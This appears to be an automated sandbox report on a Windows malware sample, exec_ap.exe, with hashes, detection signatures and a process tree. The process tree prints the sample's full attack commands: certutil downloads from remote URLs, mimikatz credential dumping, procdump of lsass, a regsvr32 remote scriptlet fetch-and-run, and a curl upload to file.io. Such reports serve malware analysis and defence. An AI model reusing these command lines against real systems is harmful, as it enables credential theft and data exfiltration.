Analysis
-
max time kernel
42s -
max time network
103s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
23-04-2022 07:25
Static task
static1
Behavioral task
behavioral1
Sample
exec_ap.exe
Resource
win7-20220414-en
General
-
Target
exec_ap.exe
-
Size
3.9MB
-
MD5
37130df0dc6057afaf677c2907eebdb4
-
SHA1
75caff36d1115049d605f91a651bf0f8479118cc
-
SHA256
08c11a4d6f275b0a5b57871c8d02097ec77019215ef66fb4e73dc7c29cf6833c
-
SHA512
357185b2e36508485329a13792a9741ea5040db09b482e6ce10a67581f982883df79b0367a53bb8fcc2574fcdf2dddb97ced0303dfd72a1ee670182bf8001274
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral1/files/0x00070000000139bd-65.dat mimikatz behavioral1/files/0x00070000000139bd-66.dat mimikatz behavioral1/files/0x00070000000139bd-67.dat mimikatz behavioral1/files/0x00070000000139bd-69.dat mimikatz behavioral1/files/0x00070000000139bd-70.dat mimikatz -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
pid Process 1928 mimi.exe 1216 procdump.exe 300 procdump64.exe 1364 cr.tmp 1884 curl.exe -
Loads dropped DLL 8 IoCs
pid Process 2012 cmd.exe 2012 cmd.exe 1908 Process not Found 1216 procdump.exe 1680 cmd.exe 1780 powershell.exe 1780 powershell.exe 1780 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 1216 procdump.exe 1460 regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1928 mimi.exe 1928 mimi.exe 1928 mimi.exe 1928 mimi.exe 1928 mimi.exe 1216 procdump.exe 1216 procdump.exe 300 procdump64.exe 300 procdump64.exe 300 procdump64.exe 300 procdump64.exe 300 procdump64.exe 300 procdump64.exe 300 procdump64.exe 300 procdump64.exe 1780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1928 mimi.exe Token: SeDebugPrivilege 1216 procdump.exe Token: SeDebugPrivilege 300 procdump64.exe Token: SeDebugPrivilege 1780 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 644 wrote to memory of 1416 644 exec_ap.exe 29 PID 644 wrote to memory of 1416 644 exec_ap.exe 29 PID 644 wrote to memory of 1416 644 exec_ap.exe 29 PID 1416 wrote to memory of 1356 1416 cmd.exe 30 PID 1416 wrote to memory of 1356 1416 cmd.exe 30 PID 1416 wrote to memory of 1356 1416 cmd.exe 30 PID 644 wrote to memory of 1632 644 exec_ap.exe 33 PID 644 wrote to memory of 1632 644 exec_ap.exe 33 PID 644 wrote to memory of 1632 644 exec_ap.exe 33 PID 1632 wrote to memory of 1176 1632 cmd.exe 34 PID 1632 wrote to memory of 1176 1632 cmd.exe 34 PID 1632 wrote to memory of 1176 1632 cmd.exe 34 PID 644 wrote to memory of 1364 644 exec_ap.exe 35 PID 644 wrote to memory of 1364 644 exec_ap.exe 35 PID 644 wrote to memory of 1364 644 exec_ap.exe 35 PID 1364 wrote to memory of 1600 1364 cmd.exe 36 PID 1364 wrote to memory of 1600 1364 cmd.exe 36 PID 1364 wrote to memory of 1600 1364 cmd.exe 36 PID 644 wrote to memory of 2012 644 exec_ap.exe 37 PID 644 wrote to memory of 2012 644 exec_ap.exe 37 PID 644 wrote to memory of 2012 644 exec_ap.exe 37 PID 2012 wrote to memory of 1928 2012 cmd.exe 38 PID 2012 wrote to memory of 1928 2012 cmd.exe 38 PID 2012 wrote to memory of 1928 2012 cmd.exe 38 PID 644 wrote to memory of 1060 644 exec_ap.exe 40 PID 644 wrote to memory of 1060 644 exec_ap.exe 40 PID 644 wrote to memory of 1060 644 exec_ap.exe 40 PID 1060 wrote to memory of 1464 1060 cmd.exe 41 PID 1060 wrote to memory of 1464 1060 cmd.exe 41 PID 1060 wrote to memory of 1464 1060 cmd.exe 41 PID 644 wrote to memory of 1920 644 exec_ap.exe 42 PID 644 wrote to memory of 1920 644 exec_ap.exe 42 PID 644 wrote to memory of 1920 644 exec_ap.exe 42 PID 1920 wrote to memory of 1216 1920 cmd.exe 43 PID 1920 wrote to memory of 1216 1920 cmd.exe 43 PID 1920 wrote to memory of 1216 1920 cmd.exe 43 PID 1920 wrote to memory of 1216 1920 cmd.exe 43 PID 1216 wrote to memory of 300 1216 procdump.exe 45 PID 1216 wrote to memory of 300 1216 procdump.exe 45 PID 1216 wrote to memory of 300 1216 procdump.exe 45 PID 1216 wrote to memory of 300 1216 procdump.exe 45 PID 644 wrote to memory of 1816 644 exec_ap.exe 46 PID 644 wrote to memory of 1816 644 exec_ap.exe 46 PID 644 wrote to memory of 1816 644 exec_ap.exe 46 PID 1816 wrote to memory of 2008 1816 cmd.exe 47 PID 1816 wrote to memory of 2008 1816 cmd.exe 47 PID 1816 wrote to memory of 2008 1816 cmd.exe 47 PID 644 wrote to memory of 1900 644 exec_ap.exe 48 PID 644 wrote to memory of 1900 644 exec_ap.exe 48 PID 644 wrote to memory of 1900 644 exec_ap.exe 48 PID 1900 wrote to memory of 1676 1900 cmd.exe 49 PID 1900 wrote to memory of 1676 1900 cmd.exe 49 PID 1900 wrote to memory of 1676 1900 cmd.exe 49 PID 1676 wrote to memory of 812 1676 cmd.exe 51 PID 1676 wrote to memory of 812 1676 cmd.exe 51 PID 1676 wrote to memory of 812 1676 cmd.exe 51 PID 1676 wrote to memory of 1544 1676 cmd.exe 52 PID 1676 wrote to memory of 1544 1676 cmd.exe 52 PID 1676 wrote to memory of 1544 1676 cmd.exe 52 PID 1676 wrote to memory of 1460 1676 cmd.exe 54 PID 1676 wrote to memory of 1460 1676 cmd.exe 54 PID 1676 wrote to memory of 1460 1676 cmd.exe 54 PID 1676 wrote to memory of 1460 1676 cmd.exe 54 PID 1676 wrote to memory of 1460 1676 cmd.exe 54
Processes
-
C:\Users\Admin\AppData\Local\Temp\exec_ap.exe"C:\Users\Admin\AppData\Local\Temp\exec_ap.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\system32\cmd.execmd /c "certutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b"2⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\system32\certutil.execertutil -urlcache -split -f https://raw.githubusercontent.com/inwestallis/first_repository/master/mim.b mim.b3⤵PID:1356
-
-
-
C:\Windows\system32\cmd.execmd /c "certutil -decode mim.b mim"2⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\system32\certutil.execertutil -decode mim.b mim3⤵PID:1176
-
-
-
C:\Windows\system32\cmd.execmd /c "expand mim mimi.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\system32\expand.exeexpand mim mimi.exe3⤵
- Drops file in Windows directory
PID:1600
-
-
-
C:\Windows\system32\cmd.execmd /c "start mimi.exe" log privilege::debug sekurlsa::logonpasswords2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\mimi.exemimi.exe log privilege::debug sekurlsa::logonpasswords3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
-
C:\Windows\system32\cmd.execmd /c "certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\system32\certutil.execertutil -urlcache -split -f http://live.sysinternals.com/procdump.exe procdump.exe3⤵PID:1464
-
-
-
C:\Windows\system32\cmd.execmd /c "start procdump.exe -accepteula -ma lsass.exe lsass.dmp"2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Users\Admin\AppData\Local\Temp\procdump.exeprocdump.exe -accepteula -ma lsass.exe lsass.dmp3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Users\Admin\AppData\Local\Temp\procdump64.exeprocdump.exe -accepteula -ma lsass.exe lsass.dmp4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
-
-
C:\Windows\system32\cmd.execmd /c "certutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk"2⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\system32\certutil.execertutil -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/gg.lnk gg.lnk3⤵PID:2008
-
-
-
C:\Windows\system32\cmd.execmd /c "start gg.lnk"2⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start "" certutil -urlcache -split -f https://cutt.ly/oPSSHWs C:\Users\Admin\AppData\Local\Temp/nc.bat & certutil -urlcache -split -f https://bit.ly/2HRvNjd C:\Users\Admin\AppData\Local\Temp/hidden.vbs & regsvr32.exe /s /u /i:https://bit.ly/3997g4Q scrobj.dll3⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\system32\certutil.execertutil -urlcache -split -f https://cutt.ly/oPSSHWs C:\Users\Admin\AppData\Local\Temp/nc.bat4⤵PID:812
-
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f https://bit.ly/2HRvNjd C:\Users\Admin\AppData\Local\Temp/hidden.vbs4⤵PID:1544
-
-
C:\Windows\system32\regsvr32.exeregsvr32.exe /s /u /i:https://bit.ly/3997g4Q scrobj.dll4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1460 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\hidden.vbs" C:\Users\Admin\AppData\Local\Temp\nc.bat"5⤵PID:880
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\nc.bat" "6⤵
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\cr.tmpC:\Users\Admin\AppData\Local\Temp\cr.tmp -urlcache -split -f https://github.com/inwestallis/first_repository/raw/master/curl.exe C:\Users\Admin\AppData\Local\Temp\curl.exe7⤵
- Executes dropped EXE
PID:1364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe C:\Users\Admin\AppData\Local\Temp\curl.exe -k -F 'file=@C:\Windows\notepad.exe' https://file.io7⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780 -
C:\Users\Admin\AppData\Local\Temp\curl.exe"C:\Users\Admin\AppData\Local\Temp\curl.exe" -k -F file=@C:\Windows\notepad.exe https://file.io8⤵
- Executes dropped EXE
PID:1884
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4D1ED785E3365DE6C966A82E99CCE8EA_216A6C169356295AB09C26D4D7D32E06
Filesize471B
MD52c4be8703de3399c2b18466b2ff245b1
SHA1cb14643a77b656d699de935cc6e19070ed7c4b1e
SHA25649640b7bfae17a6a774bf9fb1bbb7261ec379bba9d671b65fed31deacbc9900e
SHA5122f22e812f22d137cc90f29a73ea494e5c3c3e192738df703c430746f264f68e187a7fed57f0391bac2ca432ba91e5571b1de7e9d17285dbf61bd3880bb2191db
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\50CD3D75D026C82E2E718570BD6F44D0_60E83F2095C16CA099C94596E7B8AA5D
Filesize313B
MD5c7cefb81cfaecf2c7759983ec20f4032
SHA1468199e88236145aff06178a030f99356920203c
SHA25604468dcc66540299e47ea205a4a2f14f44cf796f9e12833a7d3575da71d91c32
SHA5129477d1d387c9f1e0453c44874648458177857efbf5a58f2ecb936ad73a12af2c25eddefe09da7a480b92e9c3d861262c23a8754e6232fc335e90fe20fe6d48fc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Filesize471B
MD5d3dcfce2d1ca2ab37fc53d8fa9867453
SHA19721e63fe2688d111479fef707be6c424cd57784
SHA2569aa5c688501124a491b36bd4e1946e5e0bfc4a852848d60b67b95f9b4fcb034a
SHA512ddc6667fb8b971b93c371a540b579ba80ae7867d38e636a252f2e914a40437636a3e8d9b473b07e39cc0c090c4370bb2ce56390e5971964bcfc7487c69c6ae74
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize471B
MD5689c0293466a0ab80bd0f590d57245a1
SHA10748d0449dc9ed35459e67fe7db02ec3308e49cb
SHA2566bf53f4ea22e19700870eb6201964860705310251b24ae9e3b44efb95f0f9938
SHA512bb124be939460309fcc4d43fa5f0f58b0f32be24edafd595c33721adaee82cea41a20db743e49b8de4f0897d7af0e6c3a3062e82df60a2980dd685c40a982f17
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619
Filesize471B
MD5a5e64c0b78b86a768383649b1dfc80ad
SHA18a50936b15c93b32cae72ec022f6d6c12d4a9e27
SHA2569409157ac1b5eb271401f036bba560cc40be77dad1cb62988bfab621ea679138
SHA51216cac6c2ff6a4a2b2852a140d5455554d7183eac7f09f8db701b9f151d9b32f04cd95b0e255c88eafd4a550371131f88236028eea10d618e5537d8ce88a02d3a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4D1ED785E3365DE6C966A82E99CCE8EA_216A6C169356295AB09C26D4D7D32E06
Filesize426B
MD5aca398011f2a3a2695758cc757667b47
SHA136f2aa7a7089728d77bc052f51b7ae50e574d807
SHA2566bf779a897e72ea188779718d26b25ad382043752f67da22bdcb0ab9b8b9da18
SHA512a6123fec7a27e5c010ac877cec76c81c666ec93c722b45e48e6abb5de40a01ec07c38d7a2d9342694e7e6b079e7d0b34c72ca5f2a2d4ceef36923b5de14015e8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50CD3D75D026C82E2E718570BD6F44D0_60E83F2095C16CA099C94596E7B8AA5D
Filesize434B
MD5ae1d65dc1a279cc4ec6ad513d5c25834
SHA1f8887caf5787a24999ab83dab667697fbb9caa80
SHA2568dccc68ab35ed98d54bb12dd37169abb56abffa9a03c989efcdbec6ef36275ed
SHA512fdf7ca14e41f71410eae232645744fc0847e0f49f1c035efad1f325a5b055c73809a59a373a65d38b0f4058fdb31b467725e782acfde99e21422a794b23db4bd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5031ac3080d8e2707e55e3b9a6dc9bdad
SHA1f837800169f3783b9f192b27f56f9d50b9f8c461
SHA2565aaeabdd505b5019a83f44b0bc51c1e08de4edb28197b2aa38e99b81901699d3
SHA5126336f80efeaadb68734e8852c3d26635d7b8a1a67c904ec6b6ce8ed373f0f5c972260dd779739f85e59f6c37d1a84400d3e171897ec58b4b0d7f22df3be3b022
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD57cff19d4728a27343157f447b1b3cd85
SHA124884f13eecee0c210f8eddc7e29f0062624b95a
SHA256ee3c860e155617d5171b5a336efd4cc2fd91e122d68ddc1a6295eaeb8376e052
SHA512ff8da78c6e536c99bd4fb48911a67e77235188798793a7fe0fcb8c30bc6f8b29dcb0a89469432b49463b38fe9bb6eaa8a59af211cb9fd96a3a57902519c59bf9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5a85d52471ad3fe4f1a50cab2c47c0e49
SHA15b724850cb3e947a1c44496430e94b477edf2d4f
SHA25613040a3db714e49abf28dc807e45966d6396a8d601225f76c63cccf43135db41
SHA512b20236e814b84c937189244265fe25564014a1a137cbe8a777a660c3c07dfaf73704de74c4fa3e0c94ee6f3bda38ff74d220bd7ec21fdb0c9748d5b2367a3b82
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD542fae70557866b28cc1cd15b0e52a684
SHA1cff5318c2238c2f38c667cc336ac3249f63d21b4
SHA2568bd168788820db1987e9e8a23bab5f94071b6517bf503b36df34c453361d2a97
SHA512b9bbd7d6bfc616cc6cd7bf37b800196869f3f106921f40e19239de946c29b7ca877f956ba3ff68ad1e4b642eaec460d9928ecb9a4db95fe2169dbe549a1c75f1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Filesize430B
MD528153fe3c4c4327a73d0aa64c99eebc5
SHA1138da9fab349581d36004b18987b048b47173667
SHA256913bb2e3e58b9cba1edef3dde9228d31c66b64e672df9405403b78fb187be765
SHA512827cf70e7e17853964f7614a5567d3e86f65a3c7c28ff6b002ddb0974213286fd764a097a550c8185b031d247c3705b41eec84c26ab4cfafc30de8ec4f7e323b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize434B
MD516db04f3271a6bc993716e4307b0fa1d
SHA173671f86bbdea87ca73c0e7f9bfd7a384b5aabc0
SHA256a1c074560f68a8bdf51a594980ff1126b7c052345d2c1dd37cfe2a3f837c095b
SHA5127769c281412f1529e341b02dcf2f5b731c512832130aa80e9088e04d1eb87abf7e9f2e47e873f2279de50e8897c92b8b4590c40db672591c9d95f6c56cfe8abd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619
Filesize430B
MD54c99c0cb0efe92aa0a1dd1ca5308bca6
SHA10617b23afbb6c36dc5abe7b80ade423ed35734ac
SHA256738f025be119a438e7c0643a63b0f1bdfa3d6118c6c5e86b20905d306c94b6ee
SHA51224967bb013595104a65c98cbbd65cc28ea200aa9535065c765de143ece0109b5f1f4f49c4b42081874ed49be294eeaa7b3529f7db2b16abb76552578f6910c94
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
5.2MB
MD5104023cef829fce3e34bf1514daff629
SHA1b6e7b949109298ec7ff1aa64404a859b5b41ccae
SHA25615b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5
SHA512efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e
-
Filesize
5.2MB
MD5104023cef829fce3e34bf1514daff629
SHA1b6e7b949109298ec7ff1aa64404a859b5b41ccae
SHA25615b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5
SHA512efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e
-
Filesize
2KB
MD5e72dac079247ec5ee9aa0f04e02b5eb8
SHA1fc8f701c6e9622bd133348973ae45d35220d5472
SHA256c6c2d70b69746d12c5a0d1dafa8f8f180624135467e4fd3dbf8df7814754b581
SHA512b4ac8a04ae1ba0878abe12d2d0b88ee10b4c465666f674dc8c05fc749fb7f79eb4ac7e4f481d84f879760498e0a5bddadb52eb8ffb04ed143bc08f868f8753b9
-
Filesize
80B
MD5fb9da4775539a0df96be320911f60634
SHA1e97a8fdde3d17a652285f344cd3ec130e6587aee
SHA2567d36dfbec1358c0c1ef56845dd774cea326d77a50bfe2873d3e6321dd6434352
SHA512746bcb2078ac5ebbac5d3c0bd743c5bc8390aa540b0d51c1004a4887af289e66a436b8ec327c5bad64e3097e3bb9fc5a7fd62b2de768d437467ada069e4497e1
-
Filesize
577KB
MD5d048add90a4b266a634b7d94d6c1147d
SHA10dc61af9e520de5f8d82ffe8b3b41411779ba67a
SHA25639328905e637897edc09db7c13539403022c9d920c4f98d5580a84fcac61a640
SHA5122f35ea3082e58d7d9170b5b7a06ce30e4380ae27a6a61acaf01221c4ae2a0bdab1189790235af3e97047314430fa369f677d5edfc3df6d12b3047d8b68efd0e0
-
Filesize
794KB
MD5712ef1092e630cec4e8b7fcdbe9441f7
SHA1252c9a68ab7f5d760128767973f3b0ac61955fce
SHA256dd155b80f1296d1e66de0d19044f55e6cd148eaaf0f06c616a451edaad58c754
SHA51220d024c750219b830e5856f67eaf43036aa44f3c9ebb5d6d833a2c11100bbb650e6b3be9b8c344d9f8705819facde8afdb3b151ef9189df95b857e268eeb45e9
-
Filesize
1.2MB
MD5465d5d850f54d9cde767bda90743df30
SHA1c9fb7f8a4c6b7b12b493a99a8dc6901d17867388
SHA256cb1553a3c88817e4cc774a5a93f9158f6785bd3815447d04b6c3f4c2c4b21ed7
SHA512c2ec02f8ead693db3f09defa24431c12be9748412af52183bfa6cbda2f698780b6dd1b22721aa77a1aa00a60f624a56eecfa485c45bd5ecfbdf13b2bae35b8c9
-
Filesize
1.2MB
MD5465d5d850f54d9cde767bda90743df30
SHA1c9fb7f8a4c6b7b12b493a99a8dc6901d17867388
SHA256cb1553a3c88817e4cc774a5a93f9158f6785bd3815447d04b6c3f4c2c4b21ed7
SHA512c2ec02f8ead693db3f09defa24431c12be9748412af52183bfa6cbda2f698780b6dd1b22721aa77a1aa00a60f624a56eecfa485c45bd5ecfbdf13b2bae35b8c9
-
Filesize
868B
MD56113873b074c6eedaa6e7881ee766990
SHA1d7731b3276a2a213758b441c2e48a8123001c73f
SHA256d537cc0e2818a5bd240973438d0cdfd777519aa06da41a228dc378b233aaddee
SHA512f7dbdc7a70b7459dbf7d084d728cf83bfeb02330fc7b09ad95594dcbadc4e38349cf7222bdef7daccc6c8a3f7f8444b74cc62f8db4dcab41a4785fdc9ee62c3c
-
Filesize
735KB
MD5170637b901dc67cda3d905a714096a7f
SHA1f4d82f11ca773a5606a2bc07add94a0cc76827ec
SHA2568ae63ddace21276fa6cb4b2613468e5730fc550a1374543372972e52dc232ec6
SHA5124800036de7ea669da2c8979da08642b67205bd5d9b57ca346e66d77a2098d772cd9d324165e5256981a822df3b7a721230689132466506ddeaf0011f8186b7d9
-
Filesize
735KB
MD5170637b901dc67cda3d905a714096a7f
SHA1f4d82f11ca773a5606a2bc07add94a0cc76827ec
SHA2568ae63ddace21276fa6cb4b2613468e5730fc550a1374543372972e52dc232ec6
SHA5124800036de7ea669da2c8979da08642b67205bd5d9b57ca346e66d77a2098d772cd9d324165e5256981a822df3b7a721230689132466506ddeaf0011f8186b7d9
-
Filesize
391KB
MD58cc9c90598900cecb00192da74163250
SHA18f7e488ce09cc8e1db28e1a2a075ea59104b1978
SHA2561a107c3ece1880cbbdc0a6c0817624b0dd033b02ebaf7fa366306aaca22c103d
SHA51209335b24e078f3a27229447d299d573d944e3f64df4bdead5c3406926c607d283c025b095b5499a404b9614000b041f074ff603d58e4b4e3222d6f01a03e0689
-
Filesize
88B
MD543b1ec210827465c188d768f77d20ed6
SHA16e33d80e6748c74f742e1ec8ade3a125199f97fc
SHA25641003aef7de831a72a0cd1bcc13d39008e3dc2203b3d8db576d08ddb1811e6d5
SHA5128f8f3bcbba6f74a146c73441983165f0ddf877d37cfcaf46a8fa9846f5bb7b05e8e57a5d7c7d45275071401294d3b0a12d37148de038d812a0070796d0371b82
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
5.2MB
MD5104023cef829fce3e34bf1514daff629
SHA1b6e7b949109298ec7ff1aa64404a859b5b41ccae
SHA25615b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5
SHA512efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e
-
Filesize
5.2MB
MD5104023cef829fce3e34bf1514daff629
SHA1b6e7b949109298ec7ff1aa64404a859b5b41ccae
SHA25615b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5
SHA512efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e
-
Filesize
5.2MB
MD5104023cef829fce3e34bf1514daff629
SHA1b6e7b949109298ec7ff1aa64404a859b5b41ccae
SHA25615b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5
SHA512efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e
-
Filesize
1.2MB
MD5465d5d850f54d9cde767bda90743df30
SHA1c9fb7f8a4c6b7b12b493a99a8dc6901d17867388
SHA256cb1553a3c88817e4cc774a5a93f9158f6785bd3815447d04b6c3f4c2c4b21ed7
SHA512c2ec02f8ead693db3f09defa24431c12be9748412af52183bfa6cbda2f698780b6dd1b22721aa77a1aa00a60f624a56eecfa485c45bd5ecfbdf13b2bae35b8c9
-
Filesize
1.2MB
MD5465d5d850f54d9cde767bda90743df30
SHA1c9fb7f8a4c6b7b12b493a99a8dc6901d17867388
SHA256cb1553a3c88817e4cc774a5a93f9158f6785bd3815447d04b6c3f4c2c4b21ed7
SHA512c2ec02f8ead693db3f09defa24431c12be9748412af52183bfa6cbda2f698780b6dd1b22721aa77a1aa00a60f624a56eecfa485c45bd5ecfbdf13b2bae35b8c9
-
Filesize
1.2MB
MD5465d5d850f54d9cde767bda90743df30
SHA1c9fb7f8a4c6b7b12b493a99a8dc6901d17867388
SHA256cb1553a3c88817e4cc774a5a93f9158f6785bd3815447d04b6c3f4c2c4b21ed7
SHA512c2ec02f8ead693db3f09defa24431c12be9748412af52183bfa6cbda2f698780b6dd1b22721aa77a1aa00a60f624a56eecfa485c45bd5ecfbdf13b2bae35b8c9
-
Filesize
391KB
MD58cc9c90598900cecb00192da74163250
SHA18f7e488ce09cc8e1db28e1a2a075ea59104b1978
SHA2561a107c3ece1880cbbdc0a6c0817624b0dd033b02ebaf7fa366306aaca22c103d
SHA51209335b24e078f3a27229447d299d573d944e3f64df4bdead5c3406926c607d283c025b095b5499a404b9614000b041f074ff603d58e4b4e3222d6f01a03e0689